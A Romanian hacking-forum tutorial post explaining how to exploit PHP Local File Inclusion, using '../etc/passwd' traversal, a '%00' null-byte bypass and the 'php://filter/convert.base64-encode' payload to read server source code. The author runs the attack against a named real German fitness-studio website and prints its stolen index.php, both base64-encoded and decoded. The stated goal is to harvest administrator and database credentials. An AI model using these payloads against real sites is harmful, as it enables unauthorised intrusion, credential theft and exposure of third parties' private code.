Jump to content
dancezar

LFI to Souce Code discloure

By dancezar, in Tutoriale in romana

Recommended Posts

  • Active Members
dancezar Newbie

dancezar

Posted
  • Active Members
Posted (edited)

In acest tutorial veti invata metoda php://filter pentru a exploata un LFI.

Ce este LFI:

Lfi sau Local file inclusion presupune folosirea functiei inlclude din php intr-un mod necorespunzator,astfel prin LFI putem include(nu prelua pagina sursa) si executa codul php de pe orice pagina de pe server.

Cum gasim un LFI:

LFI apare deobicei sub forma aceasta site.com/index.php?page=ceva.php daca vom introduce dupa site.com/index.php?page=ceva.php; vom obtine o eroare de genul:

lfi2.png

http://s24.postimg.org/u93f51bth/lfi2.png

Eroarea spune ca php nu poate include un fisier care nu exista.Folosindune de ../(un director inapoi) putem naviga prin foldere si include orice fisier de pe server site.com/index.php?page=../etc/passwd

Folosirea caracterului null byte:

Se foloseste atunci cand scriptul php pune dupa parametrul preluat, o extesie (de obicei .php .hrml .txt) .Caracterul null byte %00 "anuleaza" extesia care se afla dupa parametru si se foloseste astfel site.com/index.php?page=../etc/passwd%00

Acum ca am facut o scurta introductie aspra termenului LFI am sa prezint in continuare metoda php://filter.

Sa presupunem ca aveti un LFI intr-un site puteti scoate /etc/passwd dar nu puteti gasi nici un log file ,iar metoda php://input nu functioneaza.Mai ramane inca o metoda de a exploata un LFI metoda php://filter.

Cu aceasta metoda putem transforma un LFI intr-un Souce code discloure adica putem citi paginile sursa a fisierelor de pe server.

Avem urmatorul LFI site.com/index.php?page=../etc/passwd

lfi1.png

http://s9.postimg.org/ipogmj0gf/lfi1.png

Sa presupunem ca nu avem acces la loguri si nu putem transforma LFI in Remote code execution,vom incerca sa testam metoda php://filter .

Metoda php://filter se foloseste astfel:site.com/index.php?page=php://filter/convert.base64-encode/resource=FISIER

Unde FISIER este numele fisierul care vreti sa il cititi.Ce face instructiunea php://filter/convert.base64-encode/resource=FISIER?Pai ii spune functiei include sa preia continutul pagini FISIERsa il encodeze in base64 si sa il afiseze.Aceasta intructiune functionaza doar pe scripturile care folosesc ca metoda de intrare functia include si doar cele care nu au altceva in fata dupa parametrul injectie( ca de exemplu include('pages'.$_REQUEST['page']).

Rezultatul v-a fi urmatorul eu am citit chiar fisierul index.php:

lfi3.png

http://s24.postimg.org/hx9pj12qd/lfi3.png

In pagina ni se v-a furniza continutul pagini sursa encodat in base64 si cu ajutorul unui decodor putem obtine continutul pagini sursa.

Aplicabilitate:

Ce se poate face cu aceasta metoda:-/ Pai putem lua acces la datele de logare de la panouri de administrare sau de la baze de date.

Avem urmatorul site:Sportstudio Bodyworld Schkeuditz bei Leipzig

lfi4.png

http://s23.postimg.org/ta0365agb/lfi4.png

Vom testa metoda php://filter si vom citi pagina sursa a index.php: Sportstudio Bodyworld Schkeuditz bei Leipzig

lfi5.png

http://s21.postimg.org/x2fgrchg7/lfi5.png

Ce am obtinut este:


 PD9waHANCiAgaW5jbHVkZSgidXNlci5waHAiKTsNCiAgJFBIUFNFU1NJRCA9ICRfUkVRVUVTVFsiUEhQU0VTU0lEIl07DQogICRwYWdlID0gJF9SRVFVRVNUWyJwYWdlIl07IA0KICAkYmVudXR6ZXJuYW1lID0gJF9SRVFVRVNUWyJiZW51dHplcm5hbWUiXTsNCiAgJHBhc3N3b3J0ID0gJF9SRVFVRVNUWyJwYXNzd29ydCJdOw0KICAkbG9naW4gPSAkX1JFUVVFU1RbImxvZ2luIl07DQogICRsb2dvdXQgPSAkX1JFUVVFU1RbImxvZ291dCJdOw0KICAkc2VuZGVuID0gJF9SRVFVRVNUWyJzZW5kZW4iXTsNCiAgJGRhdGVpID0gJF9SRVFVRVNUWyJkYXRlaSJdOw0KICANCiAgSWYgKCRiZW51dHplcm5hbWUgJiYgJHBhc3N3b3J0KQ0KICAgIElmICgkYmVudXR6ZXJuYW1lID09PSAkdXNlciAmJiAkcGFzc3dvcnQgPT09ICRwYXNzKSB7DQogICAgICBzZXNzaW9uX3N0YXJ0KCk7DQogICAgICBoZWFkZXIoIkxvY2F0aW9uOiBpbmRleC5waHA/cGFnZT1sb2dpbi5waHAmbG9naW49b2siKTsNCiAgICB9DQogICAgZWxzZSB7DQogICAgICBoZWFkZXIoIkxvY2F0aW9uOiBpbmRleC5waHA/cGFnZT1sb2dpbi5waHAmbG9naW49ZmFsc2NoIik7DQogICAgfQ0KICBlbHNlIHsNCiAgICBJZiAoJFBIUFNFU1NJRCkgew0KICAgICAgc2Vzc2lvbl9zdGFydCgkUEhQU0VTU0lEKTsNCiAgICB9DQogIH0NCiAgSWYgKCRzZW5kZW4pIHsNCiAgICBJZiAoJHNlbmRlbj09IkphIikgew0KICAgICAgJGJpbGQgPSAkX1JFUVVFU1RbImJpbGQiXTsNCiAgICAgIElmICgkYmlsZCkgew0KICAgICAgICBAdW5saW5rKCIuL25ld3NfcGljcy8kYmlsZCIpOw0KICAgICAgfQ0KICAgICAgQHVubGluaygkZGF0ZWkpOw0KICAgICAgaGVhZGVyKCJMb2NhdGlvbjogaW5kZXgucGhwP3BhZ2U9bmV3c19sb2VzY2hlbi5waHAmYW50dz0kc2VuZGVuJmRhdGVpPSRkYXRlaSIpOw0KICAgIH0NCiAgICBlbHNlaWYgKCRzZW5kZW49PSJOZWluIikgew0KICAgICAgaGVhZGVyKCJMb2NhdGlvbjogaW5kZXgucGhwP3BhZ2U9bmV3c19sb2VzY2hlbi5waHAmYW50dz0kc2VuZGVuJmRhdGVpPSRkYXRlaSIpOw0KICAgIH0NCiAgfQ0KICANCj8+DQoNCjwhRE9DVFlQRSBIVE1MIFBVQkxJQyAiLS8vVzNDLy9EVEQgSFRNTCA0LjAxIFRyYW5zaXRpb25hbC8vRU4iPg0KPGh0bWw+DQo8aGVhZD4NCgk8dGl0bGU+U3BvcnRzdHVkaW8gQm9keXdvcmxkIFNjaGtldWRpdHogYmVpIExlaXB6aWc8L3RpdGxlPg0KCTxtZXRhIG5hbWU9IkRDLlRpdGxlIiBjb250ZW50PSJwYzR1c2VyLmRlIC0gd2ViZGVzaWduIC0gd2VidGVjIj4NCjxtZXRhIG5hbWU9IkRDLkNyZWF0b3IiIGNvbnRlbnQ9IkRldGxldiBMaWViaW5nIj4NCjxtZXRhIG5hbWU9IkRDLlN1YmplY3QiIGNvbnRlbnQ9IlNwb3J0LCBGaXRuZXNzLCBGaXRuZXNzLVN0dWRpbywgRnJlaXplaXQsIFNvbGFyaXVtLCBTYXVuYSwgQm9keXdvcmxkLCBTcG9ydHN0dWRpbyI+DQo8bWV0YSBuYW1lPSJEQy5EZXNjcmlwdGlvbiIgICBjb250ZW50PSJwYzR1c2VyLmRlIC0gd2ViZGVzaWduIC0gd2VidGVjIj4NCjxtZXRhIG5hbWU9IkRDLlB1Ymxpc2hlciIgY29udGVudD0icGM0dXNlciI+DQo8bWV0YSBuYW1lPSJEQy5Db250cmlidXRvciIgY29udGVudD0iRGV0bGV2IExpZWJpbmciPg0KPG1ldGEgbmFtZT0iREMuRGF0ZSIgY29udGVudD0iMjAwOS0wMS0xNSI+DQo8bWV0YSBuYW1lPSJEQy5UeXBlIiBjb250ZW50PSJUZXh0Ij4NCjxtZXRhIG5hbWU9IkRDLkZvcm1hdCIgY29udGVudD0idGV4dC9odG1sIj4NCjxtZXRhIG5hbWU9IkRDLklkZW50aWZpZXIiIGNvbnRlbnQ9Imh0dHA6Ly93d3cucGM0dXNlci5kZSI+DQo8bWV0YSBuYW1lPSJEQy5Tb3VyY2UiIGNvbnRlbnQ9IiI+DQo8bWV0YSBuYW1lPSJEQy5MYW5ndWFnZSIgY29udGVudD0iZGUiPg0KPG1ldGEgbmFtZT0iREMuUmVsYXRpb24iIGNvbnRlbnQ9IlN0YXJ0c2VpdGUiPg0KPG1ldGEgbmFtZT0iREMuQ292ZXJhZ2UiIGNvbnRlbnQ9IkxlaXB6aWciPg0KPG1ldGEgbmFtZT0iREMuUmlnaHRzIiBjb250ZW50PSJBbGxlIFJlY2h0ZSBsaWVnZW4gYmVpIHBjNHVzZXItRGV0bGV2IExpZWJpbmciPg0KPG1ldGEgbmFtZT0icm9ib3RzIiBjb250ZW50PSJpbmRleCI+DQo8bWV0YSBuYW1lPSJyb2JvdHMiIGNvbnRlbnQ9ImZvbGxvdyI+DQo8bWV0YSBuYW1lPSJrZXl3b3JkcyIgbGFuZz0iZGUiIGNvbnRlbnQ9IiI+DQo8bWV0YSBuYW1lPSJrZXl3b3JkcyIgbGFuZz0iZW4tdXMiIGNvbnRlbnQ9IiI+DQo8bWV0YSBuYW1lPSJrZXl3b3JkcyIgbGFuZz0iZW4iICBjb250ZW50PSIiPg0KPG1ldGEgaHR0cC1lcXVpdj0iY29udGVudC10eXBlIiBjb250ZW50PSJ0ZXh0L2h0bWw7IGNoYXJzZXQ9SVNPLTg4NTktMSI+DQo8bWV0YSBodHRwLWVxdWl2PSJDb250ZW50LVNjcmlwdC1UeXBlIiBjb250ZW50PSJ0ZXh0L2phdmFzY3JpcHQiPg0KPG1ldGEgaHR0cC1lcXVpdj0iQ29udGVudC1TdHlsZS1UeXBlIiBjb250ZW50PSJ0ZXh0L2NzcyI+DQo8bWV0YSBodHRwLWVxdWl2PSJleHBpcmVzIiBjb250ZW50PSIwIj4NCjxsaW5rIHJlbD0ic3R5bGVzaGVldCIgaHJlZj0ic3R5bGUuY3NzIj4NCjwvaGVhZD4NCg0KPGJvZHkgdG9wbWFyZ2luPTAgbGVmdG1hcmdpbj0wIHJpZ2h0bWFyZ2luPTAgYm90dG9tbWFyZ2luPTA+DQoJPHRhYmxlIHdpZHRoPTk5MCBjZWxsc3BhY2luZz0wIGNlbGxwYWRkaW5nPTAgYm9yZGVyPTAgYWxpZ249bGVmdD4NCgkJPHRyPg0KCQkJPHRkIHdpZHRoPTk5MCBoZWlnaHQ9MjM5Pg0KCQkJCTx0YWJsZSB3aWR0aD05OTAgY2VsbHNwYWNpbmc9MCBjZWxscGFkZGluZz0wIGJvcmRlcj0wIGFsaWduPWxlZnQ+DQoJCQkJCTx0cj4NCgkJCQkJCTx0ZCB3aWR0aD05OTAgaGVpZ2h0PTMzIGNvbHNwYW49Mj4NCgkJCQkJCQk8IS0tLSBob3Jpem9udGFsZSBvYmVyc3RlIGhhdXB0bmF2aWdhdGlvbi0tLT4NCgkJCQkJCQk8dGFibGUgd2lkdGg9OTkwIGNlbGxzcGFjaW5nPTAgY2VsbHBhZGRpbmc9MCBib3JkZXI9MCBhbGlnbj1sZWZ0Pg0KCQkJCQkJCQk8dHI+DQoJCQkJCQkJCQk8dGQgd2lkdGg9MTUwIGhlaWdodD0zMz48YSBocmVmPSJpbmRleC5waHA/cGFnZT1ob21lLnBocCI+PGltZyBzcmM9ImdmeC9ibGF1LmpwZyIgYWx0PSIiIHdpZHRoPSIxNTAiIGhlaWdodD0iMzMiIGJvcmRlcj0iMCI+PC9hPjwvdGQ+DQoJCQkJCQkJCQk8dGQgd2lkdGg9ODQgaGVpZ2h0PTMzPjxhIGhyZWY9ImluZGV4LnBocD9wYWdlPWhvbWUucGhwIj48aW1nIHNyYz0iZ2Z4L2JsYXUuanBnIiBhbHQ9IiIgd2lkdGg9Ijg0IiBoZWlnaHQ9IjMzIiBib3JkZXI9IjAiPjwvYT48L3RkPg0KCQkJCQkJCQkJPHRkIHdpZHRoPTExMSBoZWlnaHQ9MzM+PGEgaHJlZj0iaW5kZXgucGhwP3BhZ2U9aG9tZS5waHAiPjxpbWcgc3JjPSJnZngvYmxhdS5qcGciIGFsdD0iIiB3aWR0aD0iMTExIiBoZWlnaHQ9IjMzIiBib3JkZXI9IjAiPjwvYT48L3RkPg0KCQkJCQkJCQkJPHRkIHdpZHRoPSI2NDciIGJhY2tncm91bmQ9ImdmeC9vZWZmbnVuZ3N6ZWl0ZW4uanBnIj4mbmJzcDs8L3RkPg0KCQkJCQkJCQk8L3RyPg0KCQkJCQkJCTwvdGFibGU+DQoJCQkJCQk8L3RkPg0KCQkJCQk8L3RyPg0KCQkJCQk8dHI+DQoJCQkJCQk8dGQgd2lkdGg9NTYzIGhlaWdodD0yMDYgYmFja2dyb3VuZD0iZ2Z4L21pdHRlbGhlYWRlcmxpbmtzLmpwZyIgdmFsaWduPXRvcD4NCgkJCQkJCQk8dGFibGUgd2lkdGg9NTYzIGNlbGxzcGFjaW5nPTAgY2VsbHBhZGRpbmc9MCBib3JkZXI9MCBhbGlnbj1sZWZ0Pg0KCQkJCQkJCQkJPHRyPg0KCQkJCQkJCQkJPHRkIHJvd3NwYW49NCB3aWR0aD00NDMgaGVpZ2h0PTE3MD4mbmJzcDs8L3RkPg0KCQkJCQkJCQkJPHRkIHdpZHRoPTEyMCBoZWlnaHQ9Nzk+Jm5ic3A7PC90ZD4NCgkJCQkJCQkJPC90cj4NCgkJCQkJCQkJPHRyPg0KCQkJCQkJCQkJPHRkIHdpZHRoPTEyMD48YSBocmVmPSJpbmRleC5waHA/cGFnZT1ob21lLnBocCI+PGltZyBzcmM9ImdmeC9zZXJ2aWNlLmdpZiIgYWx0PSIiIHdpZHRoPSIxMjEiIGhlaWdodD0iMjMiIGJvcmRlcj0iMCI+PC9hPjwvdGQ+DQoJCQkJCQkJCTwvdHI+DQoJCQkJCQkJCTx0cj4NCgkJCQkJCQkJCTx0ZCB3aWR0aD0xMjA+PGEgaHJlZj0iaW5kZXgucGhwP3BhZ2U9c2VydmljZS5waHAiPjxpbWcgc3JjPSJnZngvc2VydmljZS5naWYiIGFsdD0iIiB3aWR0aD0iMTIxIiBoZWlnaHQ9IjMyIiBib3JkZXI9IjAiPjwvYT48L3RkPg0KCQkJCQkJCQk8L3RyPg0KCQkJCQkJCQk8dHI+PHRkIHdpZHRoPTEyMD48YSBocmVmPSJpbmRleC5waHA/cGFnZT1rb250YWt0ZS5waHAiPjxpbWcgc3JjPSJnZngva29udGFrdGUuZ2lmIiBhbHQ9IiIgd2lkdGg9IjEyMSIgaGVpZ2h0PSIzNiIgYm9yZGVyPSIwIj48L2E+PC90ZD4NCgkJCQkJCQkgIDwvdHI+DQoJCQkJCQkJCTx0cj4NCgkJCQkJCQkJCTx0ZCBjb2xzcGFuPTIgd2lkdGg9NTYzIGhlaWdodD0zNj4NCgkJCQkJCQkJCTwhLS0gdW50ZXJlIGhvcml6b250YWxlIGhhdXB0bmF2aS0tPg0KCQkJCQkJCQkJCTx0YWJsZSB3aWR0aD01NjMgY2VsbHNwYWNpbmc9MCBjZWxscGFkZGluZz0wIGJvcmRlcj0wIGFsaWduPWxlZnQ+DQoJCQkJCQkJCQkJCTx0cj4NCgkJCQkJCQkJCQkJCTx0ZCB3aWR0aD0xMTA+PGEgaHJlZj0iaW5kZXgucGhwP3BhZ2U9aG9tZS5waHAiPjxpbWcgc3JjPSJnZngvaG9tZS5naWYiIGFsdD0iIiB3aWR0aD0iNzIiIGhlaWdodD0iMzYiIGJvcmRlcj0iMCI+PC9hPjwvdGQ+DQoJCQkJCQkJCQkJCQk8dGQgd3VpZHRoPTcyPjxhIGhyZWY9ImluZGV4LnBocD9wYWdlPWFuZmFocnQucGhwIj48aW1nIHNyYz0iZ2Z4L2FuZmFocnQuZ2lmIiBhbHQ9IiIgd2lkdGg9IjExMCIgaGVpZ2h0PSIzNiIgYm9yZGVyPSIwIj48L2E+PC90ZD4NCgkJCQkJCQkJCQkJCTx0ZCB3aWR0aD0xMjc+PGEgaHJlZj0iaW5kZXgucGhwP3BhZ2U9YW5nZWJvdC5waHAiPjxpbWcgc3JjPSJnZngvYW5nZWJvdC5naWYiIGFsdD0iIiB3aWR0aD0iMTE1IiBoZWlnaHQ9IjM2IiBib3JkZXI9IjAiPjwvYT48L3RkPg0KCQkJCQkJCQkJCQkJPHRkIHdpZHRoPTE0MD48YSBocmVmPSJpbmRleC5waHA/cGFnZT1rb250YWt0LnBocCI+PGltZyBzcmM9ImdmeC9rb250YWt0LmdpZiIgYWx0PSIiIHdpZHRoPSIxMjciIGhlaWdodD0iMzYiIGJvcmRlcj0iMCI+PC9hPjwvdGQ+DQoJCQkJCQkJCQkJCQk8dGQgd2lkdGg9MTE1PjxhIGhyZWY9ImluZGV4LnBocD9wYWdlPWltcHJlc3N1bS5waHAiPjxpbWcgc3JjPSJnZngvaW1wcmVzc3VtLmdpZiIgYWx0PSIiIHdpZHRoPSIxNDAiIGhlaWdodD0iMzYiIGJvcmRlcj0iMCI+PC9hPjwvdGQ+DQoJCQkJCQkJCQkJCTwvdHI+DQoJCQkJCQkJCSAgPC90YWJsZT4JCQkJCQkJCQk8L3RkPg0KCQkJCQkJCQk8L3RyPg0KCQkJCQkJCTwvdGFibGU+DQoJCQkJCSAgPC90ZD4NCgkJCQkJCTwhLS0gcmVjaHRlciBoZWFkZXJ0ZWlsIG1pdHRlIChsb2dvKS0tPg0KCQkJCQkJPHRkIHdpZHRoPTQyNyBoZWlnaHQ9MjA2IGJhY2tncm91bmQ9ImdmeC9taXR0ZWxoZWFkZXJyZWNodHMuanBnIj4mbmJzcDs8L3RkPg0KCQkJCQk8L3RyPg0KCQkJCTwvdGFibGU+DQoJCQk8L3RkPg0KCQk8L3RyPg0KCQk8dHI+DQoJCQk8dGQgaGVpZ2h0PTcxIHdpZHRoPTk5MCBzdHlsZT0iYmFja2dyb3VuZC1pbWFnZTp1cmwoZ2Z4L3VudGVyaGVhZGVyLmpwZyk7IGJhY2tncm91bmQtcmVwZWF0Om5vLXJlcGVhdCIgdmFsaWduPXRvcD4NCgkJCQk8dGFibGUgd2lkdGg9OTkwIGNlbGxzcGFjaW5nPTAgY2VsbHBhZGRpbmc9MCBib3JkZXI9MCBhbGlnbj1sZWZ0Pg0KCQkJCQk8dHI+DQoJCQkJCQk8IS0tIG5ld3NoZWFkZXIgLS0tPg0KCQkJCQkJPHRkIHdpZHRoPTQwMCBoZWlnaHQ9NzEgdmFsaWduPSJib3R0b20iPg0KICAgICAgICAgICAgICA8dGFibGUgaWQ9InVlYmVyIj4NCiAgICAgICAgICAgICAgICA8dHI+DQogICAgICAgICAgICAgICAgICA8dGQgd2lkdGg9MTkwPg0KICAgICAgICAgICAgICAgICAgPC90ZD4NCiAgICAgICAgICAgICAgICAgIDx0ZCB3aWR0aD0yMTA+DQogICAgICAgICAgICAgICAgICAgIE5ld3MNCiAgICAgICAgICAgICAgICAgIDwvdGQ+DQogICAgICAgICAgICAgICAgPC90cj4NCiAgICAgICAgICAgICAgPC90YWJsZT4NCiAgICAgICAgICAgIDwvdGQ+DQoJCQkJCQk8IS0tIHVlYmVyc2NocmlmdCBkZXMgamV3ZWlsaWdlbiBpbmhhbHRlcyAtLT4NCgkJCQkJCTx0ZCB3aWR0aD01OTAgYWxpZ249ImxlZnQiIHZhbGlnbj0iYm90dG9tIj4NCiAgICAgICAgICAgICAgPHRhYmxlIGlkPSJ1ZWJlciI+DQogICAgICAgICAgICAgICAgPHRyPg0KICAgICAgICAgICAgICAgICAgPHRkIHdpZHRoPTMwPg0KICAgICAgICAgICAgICAgICAgPC90ZD4NCiAgICAgICAgICAgICAgICAgIDx0ZCB3aWR0aD01NjA+DQogICAgICAgICAgICAgICAgICAgIDw/cGhwIA0KICAgICAgICAgICAgICAgICAgICAgIGluY2x1ZGUoInVlYmVyc2NocmlmdGVuLnBocCIpOw0KICAgICAgICAgICAgICAgICAgICA/Pg0KICAgICAgICAgICAgICAgICAgPC90ZD4NCiAgICAgICAgICAgICAgICA8L3RyPg0KICAgICAgICAgICAgICA8L3RhYmxlPg0KICAgICAgICAgICAgPC90ZD4NCgkJCQkJPC90cj4NCgkJCQkJPHRyPg0KCQkJCQkJPCEtLSBuZXdzIC0tLT4NCgkJCQkJCTx0ZCB3aWR0aD00MDAgdmFsaWduPSJ0b3AiPg0KCQkJCQkJPCEtLSBhbiBkaWVzZXIgc3RlbGxlIHBocCBhdXMgZGF0ZW5iYW5rLS0+DQoJCQkJCQkgIDx0YWJsZT4NCiAgICAgICAgICAgICAgICA8dHI+DQogICAgICAgICAgICAgICAgICA8dGQgdmFsaWduPSJ0b3AiPg0KICAgICAgICAgICAgICAgICAgICA8P3BocCBpbmNsdWRlKCJuZXdzLnBocCIpID8+DQogICAgICAgICAgICAgICAgICA8L3RkPg0KICAgICAgICAgICAgICAgIDwvdHI+DQogICAgICAgICAgICAgIDwvdGFibGU+DQoJCQkJCQk8L3RkPg0KCQkJCQkJPCEtLSAgamV3ZWlsaWdlciBpbmhhbHQgLS0+DQoJCQkJCQk8dGQgd2lkdGg9NTkwIHZhbGlnbj0idG9wIj4NCgkJCQkJCSAgPHRhYmxlIHdpZHRoPTU5MCBpZD0ibWFpbiI+DQogICAgICAgICAgICAgICAgPHRyPg0KICAgICAgICAgICAgICAgICAgPHRkIHdpZHRoPTQ1PiZuYnNwOw0KICAgICAgICAgICAgICAgICAgICANCiAgICAgICAgICAgICAgICAgIDwvdGQ+DQogICAgICAgICAgICAgICAgICA8dGQgdmFsaWduPSJ0b3AiIHdpZHRoPTU2MD4NCiAgICAgICAgICAgICAgICAgICAgPD9waHAgDQogICAgICAgICAgICAgICAgICAgICAgSWYgKHN0cnBvcygkX1JFUVVFU1RbInBhZ2UiXSwgImh0dHAiKSA9PT0gMCB8fCBzdHJwb3MoJF9SRVFVRVNUWyJwYWdlIl0sICJodHRwIikgPiAwKSB7ICRwYWdlPSJob21lLnBocCI7IH07DQogICAgICAgICAgICAgICAgICAgICAgSWYgKHN0cnBvcygkX1JFUVVFU1RbInBhZ2UiXSwgInd3dyIpID09PSAwIHx8IHN0cnBvcygkX1JFUVVFU1RbInBhZ2UiXSwgInd3dyIpID4gMCkgeyAkcGFnZT0iaG9tZS5waHAiOyB9Ow0KICAgICAgICAgICAgICAgICAgICAgIElmIChzdHJwb3MoJF9SRVFVRVNUWyJwYWdlIl0sICJmdHAiKSA9PT0gMCB8fCBzdHJwb3MoJF9SRVFVRVNUWyJwYWdlIl0sICJmdHAiKSA+IDApIHsgJHBhZ2U9ImhvbWUucGhwIjsgfTsNCiAgICAgICAgICAgICAgICAgICAgICBJZiAoJHBhZ2UpIHsgaW5jbHVkZSgkcGFnZSk7IH0NCiAgICAgICAgICAgICAgICAgICAgICBlbHNlIHsgaW5jbHVkZSgiaG9tZS5waHAiKTsgfQ0KICAgICAgICAgICAgICAgICAgICA/Pg0KICAgICAgICAgICAgICAgICAgPC90ZD4NCiAgICAgICAgICAgICAgICA8L3RyPg0KICAgICAgICAgICAgICA8L3RhYmxlPg0KCQkJCQkJPC90ZD4NCgkJCQkJPC90cj4NCgkJCQk8L3RhYmxlPg0KCQkJPC90ZD4NCgkJPC90cj4NCgkJPCEtLS0gZm9vdGVyLS0tPg0KCQk8dHI+DQoJCQk8dGQgd2lkdGg9OTkwIGhlaWdodD02MD4NCgkJCQk8dGFibGUgd2lkdGg9OTkwIGNlbGxzcGFjaW5nPTAgY2VsbHBhZGRpbmc9MCBib3JkZXI9MCBhbGlnbj1sZWZ0IGJhY2tncm91bmQ9ImdmeC9mb290ZXIuanBnIj4NCgkJCQkJPHRyPg0KICAgICAgICAgICAgPHRkIHdpZHRoPTMwPg0KICAgICAgICAgICAgICA8ZGl2IGFsaWduPSJqdXN0aWZ5Ij48L2Rpdj48L3RkPg0KICAgICAgICAgIDw/cGhwDQogICAgICAgICAgSWYgKCRQSFBTRVNTSUQpIHsNCiAgICAgICAgICAgIGVjaG8gIg0KICAgICAgICAgICAgPHRkIHdpZHRoPTg1MCBoZWlnaHQ9NjMgdmFsaWduPVwibWlkZGxlXCIgYWxpZ249XCJsZWZ0XCI+DQogIAkJCQkgICAgPGEgaHJlZj1cImxvZ291dC5waHBcIiBjbGFzcz1hZG1pbj5Mb2dvdXQ8L2E+DQoJCQkJCQk8L3RkPiI7DQogICAgICAgICAgfQ0KICAgICAgICAgIGVsc2Ugew0KICAgICAgICAgICAgZWNobyAiDQoJCQkJCQk8dGQgd2lkdGg9OTYwIGhlaWdodD02MyB2YWxpZ249XCJtaWRkbGVcIj4NCiAgCQkJCSAgICA8YSBocmVmPVwiaW5kZXgucGhwP3BhZ2U9aG9tZS5waHBcIj5Ib21lPC9hPg0KCQkJCQkJPC90ZD4iOw0KICAgICAgICAgIH0NCiAgICAgICAgICA/Pg0KCQkJCQk8L3RyPg0KCQkJCTwvdGFibGU+DQoJCQk8L3RkPg0KCQk8L3RyPg0KCTwvdGFibGU+DQo8L2JvZHk+DQo8L2h0bWw+

Decodat este:


<?php
  include("user.php");
  $PHPSESSID = $_REQUEST["PHPSESSID"];
  $page = $_REQUEST["page"]; 
  $benutzername = $_REQUEST["benutzername"];
  $passwort = $_REQUEST["passwort"];
  $login = $_REQUEST["login"];
  $logout = $_REQUEST["logout"];
  $senden = $_REQUEST["senden"];
  $datei = $_REQUEST["datei"];

  If ($benutzername && $passwort)
    If ($benutzername === $user && $passwort === $pass) {
      session_start();
      header("Location: index.php?page=login.php&login=ok");
    }
    else {
      header("Location: index.php?page=login.php&login=falsch");
    }
  else {
    If ($PHPSESSID) {
      session_start($PHPSESSID);
    }
  }
  If ($senden) {
    If ($senden=="Ja") {
      $bild = $_REQUEST["bild"];
      If ($bild) {
        @unlink("./news_pics/$bild");
      }
      @unlink($datei);
      header("Location: index.php?page=news_loeschen.php&antw=$senden&datei=$datei");
    }
    elseif ($senden=="Nein") {
      header("Location: index.php?page=news_loeschen.php&antw=$senden&datei=$datei");
    }
  }

?>

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
	<title>Sportstudio Bodyworld Schkeuditz bei Leipzig</title>
	<meta name="DC.Title" content="pc4user.de - webdesign - webtec">
<meta name="DC.Creator" content="Detlev Liebing">
<meta name="DC.Subject" content="Sport, Fitness, Fitness-Studio, Freizeit, Solarium, Sauna, Bodyworld, Sportstudio">
<meta name="DC.Description"   content="pc4user.de - webdesign - webtec">
<meta name="DC.Publisher" content="pc4user">
<meta name="DC.Contributor" content="Detlev Liebing">
<meta name="DC.Date" content="2009-01-15">
<meta name="DC.Type" content="Text">
<meta name="DC.Format" content="text/html">
<meta name="DC.Identifier" content="http://www.pc4user.de">
<meta name="DC.Source" content="">
<meta name="DC.Language" content="de">
<meta name="DC.Relation" content="Startseite">
<meta name="DC.Coverage" content="Leipzig">
<meta name="DC.Rights" content="Alle Rechte liegen bei pc4user-Detlev Liebing">
<meta name="robots" content="index">
<meta name="robots" content="follow">
<meta name="keywords" lang="de" content="">
<meta name="keywords" lang="en-us" content="">
<meta name="keywords" lang="en"  content="">
<meta http-equiv="content-type" content="text/html; charset=ISO-8859-1">
<meta http-equiv="Content-Script-Type" content="text/javascript">
<meta http-equiv="Content-Style-Type" content="text/css">
<meta http-equiv="expires" content="0">
<link rel="stylesheet" href="style.css">
</head>

<body topmargin=0 leftmargin=0 rightmargin=0 bottommargin=0>
	<table width=990 cellspacing=0 cellpadding=0 border=0 align=left>
		<tr>
			<td width=990 height=239>
				<table width=990 cellspacing=0 cellpadding=0 border=0 align=left>
					<tr>
						<td width=990 height=33 colspan=2>
							<!--- horizontale oberste hauptnavigation--->
							<table width=990 cellspacing=0 cellpadding=0 border=0 align=left>
								<tr>
									<td width=150 height=33><a href="index.php?page=home.php"><img src="gfx/blau.jpg" alt="" width="150" height="33" border="0"></a></td>
									<td width=84 height=33><a href="index.php?page=home.php"><img src="gfx/blau.jpg" alt="" width="84" height="33" border="0"></a></td>
									<td width=111 height=33><a href="index.php?page=home.php"><img src="gfx/blau.jpg" alt="" width="111" height="33" border="0"></a></td>
									<td width="647" background="gfx/oeffnungszeiten.jpg"> </td>
								</tr>
							</table>
						</td>
					</tr>
					<tr>
						<td width=563 height=206 background="gfx/mittelheaderlinks.jpg" valign=top>
							<table width=563 cellspacing=0 cellpadding=0 border=0 align=left>
									<tr>
									<td rowspan=4 width=443 height=170> </td>
									<td width=120 height=79> </td>
								</tr>
								<tr>
									<td width=120><a href="index.php?page=home.php"><img src="gfx/service.gif" alt="" width="121" height="23" border="0"></a></td>
								</tr>
								<tr>
									<td width=120><a href="index.php?page=service.php"><img src="gfx/service.gif" alt="" width="121" height="32" border="0"></a></td>
								</tr>
								<tr><td width=120><a href="index.php?page=kontakte.php"><img src="gfx/kontakte.gif" alt="" width="121" height="36" border="0"></a></td>
							  </tr>
								<tr>
									<td colspan=2 width=563 height=36>
									<!-- untere horizontale hauptnavi-->
										<table width=563 cellspacing=0 cellpadding=0 border=0 align=left>
											<tr>
												<td width=110><a href="index.php?page=home.php"><img src="gfx/home.gif" alt="" width="72" height="36" border="0"></a></td>
												<td wuidth=72><a href="index.php?page=anfahrt.php"><img src="gfx/anfahrt.gif" alt="" width="110" height="36" border="0"></a></td>
												<td width=127><a href="index.php?page=angebot.php"><img src="gfx/angebot.gif" alt="" width="115" height="36" border="0"></a></td>
												<td width=140><a href="index.php?page=kontakt.php"><img src="gfx/kontakt.gif" alt="" width="127" height="36" border="0"></a></td>
												<td width=115><a href="index.php?page=impressum.php"><img src="gfx/impressum.gif" alt="" width="140" height="36" border="0"></a></td>
											</tr>
								  </table>									</td>
								</tr>
							</table>
					  </td>
						<!-- rechter headerteil mitte (logo)-->
						<td width=427 height=206 background="gfx/mittelheaderrechts.jpg"> </td>
					</tr>
				</table>
			</td>
		</tr>
		<tr>
			<td height=71 width=990 style="background-image:url(gfx/unterheader.jpg); background-repeat:no-repeat" valign=top>
				<table width=990 cellspacing=0 cellpadding=0 border=0 align=left>
					<tr>
						<!-- newsheader --->
						<td width=400 height=71 valign="bottom">
              <table id="ueber">
                <tr>
                  <td width=190>
                  </td>
                  <td width=210>
                    News
                  </td>
                </tr>
              </table>
            </td>
						<!-- ueberschrift des jeweiligen inhaltes -->
						<td width=590 align="left" valign="bottom">
              <table id="ueber">
                <tr>
                  <td width=30>
                  </td>
                  <td width=560>
                    <?php 
